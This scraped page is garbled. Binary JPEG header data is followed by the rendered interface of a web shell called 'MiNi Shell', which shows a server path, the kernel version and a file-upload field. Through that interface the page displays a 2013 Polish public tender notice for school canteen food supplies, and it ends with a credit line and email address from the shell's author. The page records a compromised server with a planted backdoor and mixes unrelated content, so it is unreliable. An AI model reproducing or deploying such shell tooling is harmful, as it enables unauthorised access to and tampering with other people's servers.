JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131021/219699-N-2013.html

<p class="kh_header"><b>Bieżuń: ZAKUP I DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ W ZESPOLE PLACÓWEK OŚWIATOWYCH W BIEŻUNIU</b><br>
<b>Numer ogłoszenia: 219699 - 2013; data zamieszczenia: 21.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Placówek Oświatowych w Bieżuniu , ul. Gołębiowskiego 1, 09-320 Bieżuń, woj. mazowieckie, tel. 23 657 84 00, faks 23 657 84 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zpo.hostnet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ W ZESPOLE PLACÓWEK OŚWIATOWYCH W BIEŻUNIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> HERBATA SAGA GRANULKI (90G) 72 SZT, CUKIER (1KG) 636 SZT, 
MARGARYNA ZWYKŁA (250G) 117 SZT, MĄKA ZIEMNIACZANA (1KG) 33 KG, 
SYROP MALINOWY (440ML) 69 SZT,  CUKIER PUDER (400G) 13 SZT,
KASZA JĘCZMIENNA ŚREDNIA (500G) 196 KG, ZACIERKI BABUNI (250G) 125 SZT, KONCENTRAT POMIDOROWY (0,970G) 83 SZT, 
KONCENTRAT POMIDOROWY (190G) 73 SZT, KWASEK CYTRYNOWY (20G) 42 SZT, MAJONEZ POMORSKI (620G) 59 SZT, MAJONEZ POMORSKI (260G) 42 SZT,
MAJERANEK (10G) 91 SZT, MAKARON ŁĄCKI ŚWIDERKI (400G) 588 SZT, 
MAKARON ŁĄCKI KRAJANKA (400G) 141 SZT, MAKARON ŁĄCKI NITKA (400G) 
163 SZT, MAKARON BĄCZEK (400G) 167 SZT, MAKARON SPAGHETTI (400G) 
271 SZT, MAKARON GWIAZDECZKI (250G) 25 SZT, MĄKA PSZENNA (1KG) 633 KG, OLEJ OLEO (1L) 332 SZT, PIEPRZ MIELONY (20G) 258 SZT, SOS SAŁATKOWY KNORR (9G) 64 SZT, KOMPOT WIŚNIOWY (900ML) 793 SZT, KOMPOT PORZECZKOWY (900ML) 798 SZT,  KOMPOT TRUSKAWKOWY (900ML) 796 SZT, PRZYPRAWA W PŁYNIE MAGGI (1L) 21 SZT, RYŻ (1KG) 171 KG, PRZYPRAWA KUCHAREK LUB RÓWNOWAŻNY (200G) 157 SZT, MUSZTARDA SAREPSKA (200G) 67 SZT, KETCHUP WŁOCŁAWEK- TUBA ŁAGODNY (480G) 134 SZT, SOS PIECZENIOWY JASNY WINIARY LUB RÓWNOWAŻNY (30G) 105 SZT, SÓL (1KG) 219KG, CYNAMON (20G) 18 SZT, KAKAO WEDEL (100G) 44 SZT, KAWA ZBOŻOWA INKA (150G) 26 SZT, 
NUTELLA (230G) 159 SZT, LIŚĆ LAUROWY (8G) 57 SZT, KASZA GRYCZANA (1KG) 
25 KG, OCET (0,5L) 54 SZT, GALARETKA (75G) 346 SZT, PRZYPRAWA DO KURCZAKA(30G) 25 SZT, SODA SPOŻYWCZA (100G) 9 SZT, SOS PIECZARKOWY WINIARY LUB RÓWNOWAŻNY (BEZ DODATKU KONSERWANTÓW I GLUTAMINIANU SODU) (32G) 58 SZT, DROŻDŻE (100G) 23 SZT, ZUPA ŻUREK KNORR LUB RÓWNOWAŻNY (54G) 292 SZT, ŻUREK BUTELKA (450ML) 26 SZT,
 DŻEMY ŁOWICZ (280G) 506 SZT, CUKIER WANILIOWY (30G) 280 SZT, ZIELE ANGIELSKIE (15G) 57 SZT, PROSZEK DO PIECZENIA (30G) 146 SZT, CZOSNEK W PROSZKU (20 G) 105 SZT, KUKURYDZA KONSERWOWA KWIDZYN (220G) 83 SZT, GROSZEK KONSERWOWY (400G) 60 SZT, OGÓRKI KONSERWOWE (900ML) 99 SZT, OGÓRKI KISZONE (900ML) 57 SZT, PASZTET PODLASKI (155G) 147 SZT, PAPRYKARZ SZCZECIŃSKI (300G) 46 SZT, BURACZKI-SUSZ (100G) 156 SZT , 
PIETRUSZKA-SUSZ (15G) 51 SZT, KOPER- SUSZ (20G) 35 SZT, PAPRYKA MIELONA OSTRA (20G) 33 SZT, PAPRYKA MIELONA SŁODKA (20G) 28 SZT,
 BUŁKA TARTA (500G) 122 SZT, SMALEC (200G) 89 SZT, CHRZAN SŁOIK (180G) 7 SZT,
PŁATKI OWSIANE BŁYSKAWICZNE (400G) 35 SZT, PŁATKI RYŻOWE BŁYSKAWICZNE (250G) 56 SZT, PŁATKI JĘCZMIENNE BŁYSKAWICZNE (400G) 25 SZT, PŁATKI KUKURYDZIANE LUBELLA (250G) 42 SZT, PŁATKI KUKURYDZIANE CORNFLAKES (500G) 84 SZT, PŁATKI CZEKOLADOWE LUBELLA (250G) 67 SZT, PŁATKI NESQUIK (250G)
 42 SZT, PŁATKI CHOCAPIC (250G) 21 SZT, JAJKA (50G) 5313 SZT, SAŁATKA Z CZERWONEJ KAPUSTY (840G) 78 SZT, HERBATA SAGA 100 TOREBEK W OPAKOWANIU (140G) 21 SZT, MAKRELA WĘDZONA 15 KG,  PASZTET WIELKOPOLSKI (131G) 48 SZT, ZIEMNIAKI 8230 KG, WŁOSZCZYZNA 1100 SZT, GROCH ŁUSKANY (400G) 72 SZT, CEBULA 162 KG, SZCZYPIOR 13 SZT, KAPUSTA KISZONA 363 KG, 
KAPUSTA PEKIŃSKA 248KG, MARCHEW 626 KG, OGÓRKI ŚWIEŻE 349 KG, OGÓRKI KISZONE-FOLIA (500G) 26 SZT, PIECZARKI 108 KG, KALAFIOR 31 SZT, 
BROKUŁY 21 SZT, PIETRUSZKA NATKA 169 SZT, KAPUSTA BIAŁA 470 KG, POMIDOR 183 KG, POR 38 SZT, JABŁKA 751 KG, RZODKIEWKA 53 SZT, BANANY 320 KG, MANDARYNKI 84 KG, CYTRYNA 50 KG, NEKTARYNKI 233 KG, TRUSKAWKI 70 KG, 
SELER 6 KG, FASOLA DROBNA (400G) 72 SZT, KOPER ŚWIEŻY 79 SZT, OGÓRKI- PRZECIER (500G) 209 SZT, SAŁATA MASŁOWA 99 SZT, PAPRYKA ŚWIEŻA 36 KG, KARKÓWKA B/K 492 KG, SCHAB B/K 309 KG, GOLONKA 18 KG, ŁOPATKA B/K 98 KG, ŻEBERKA 14 KG, SŁONINA 40 KG, WOŁOWE Z KOŚCIĄ 65 KG, BOCZEK SKÓROWANY WĘDZONY 85 KG, KIEŁBASA WEEKENDOWA ZWYCZAJNA 251 KG, POLĘDWICA MIODOWA 25 KG, POLĘDWICA KANADYJSKA 13 KG, POLĘDWICA SOPOCKA 34 KG, PARÓWECZKI PALUSZKI 131 KG, SERDELKI 51 KG, INDYK FASZEROWANY 17 KG, KURCZAK FASZEROWANY 9 KG, KIEŁBASA KRAKOWSKA 17KG, KIEŁBASA ŻYWIECKA 
14 KG, KIEŁBASA SZYNKOWA 22 KG, KIEŁBASA BIAŁA NA RUSZT 47 KG, PRZYSMAK W KONSERWIE 28 KG, SZYNKA Z PIERSI INDYKA 23 KG, SZYNKA WIEPRZOWA 37 KG, KASZANKA 19 KG, SCHAB PARZONY W MAJERANKU 26 KG, PASZTET Z PIECA 24 KG, BURACZKI ĆWIKŁOWE (500G-MROŻONKA) 752 SZT, BROKUŁY (450G-MROŻONKA) 
32 SZT, BUKIET WARZYW (450G- MROŻONKA) 69 SZT, BARSZCZ UKRAIŃSKI (450G-MROŻONKA) 109 SZT, ZUPA JARZYNOWA (450G - MROŻONKA) 63 SZT, FASOLKA SZPARAGOWA (450G-MROŻONKA) 73 SZT, LECZO (450G-MROŻONKA) 17 SZT, KALAFIOR (450G-MROŻONKA) 16 SZT, PYZY Z MIĘSEM (450G-MROŻONKA) 294 SZT, FILET MIRUNA (MROŻONKA) 168 KG, MASŁO EXTRA (KOSTKA 200G) 882 SZT, ŚMIETANA 30% (200G) 2268 SZT, MLEKO 2% (1L) 2265 SZT, MLEKO 2% KARTON UHT (1L) 531 SZT. SER TWAROGOWY (464 KG), SER ŻÓŁTY SMAKOSZ 130 KG, SER ŻÓŁTY KRÓLEWSKI 45 KG, SEREK TOPIONY HOCHLAND- BATON (100G) 157 SZT, SEREK TOPIONY HOCHLAND- ZEGAR (200G) 52 SZT, JOGURT GRATKA (115G) 2248 SZT, JOGURT GRATKA (290G) 151 SZT, JOGURT SERDUSZKO (125G) 3292 SZT, JOGURT OWOCOWY (130G) 1297 SZT, JOGURT NATURALNY (330G) 21 SZT, SEREK HOMOGENIZOWANY (180G) 56 SZT, PORCJA ZE SKRZYDEŁKAMI 557 KG, UDZIEC Z KURCZAKA 546 KG, FILET Z KURCZAKA 567 KG, BUŁKA ZWYKŁA (120G) 326 SZT, CHLEB ZWYKŁY PSZENNY- KROJONY (500G) 1594 SZT, CHLEB MIESZANY KROJONY (400G) 116 SZT, BUŁKA DROŻDŻOWA (130G) 1671 SZT, BUŁKA MAŚLANA (60G) 
1680 SZT, BUŁKA RAZOWA (100G) 830 SZT, BUŁKA KAJZERKA (60G) 15404 SZT.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zpo.hostnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Placówek Oświatowych w Bieżuniu, ul. Stefana Gołębiowskiego 1, 09-320 Bieżuń, woj. mazowieckie - w sekretariacie szkoły.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 10:00, miejsce: sekretariat Zespołu Placówek Oświatowych w Bieżuniu,ul. Gołębiowskiego 1, 09-320 Bieżuń, woj. mazowieckie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com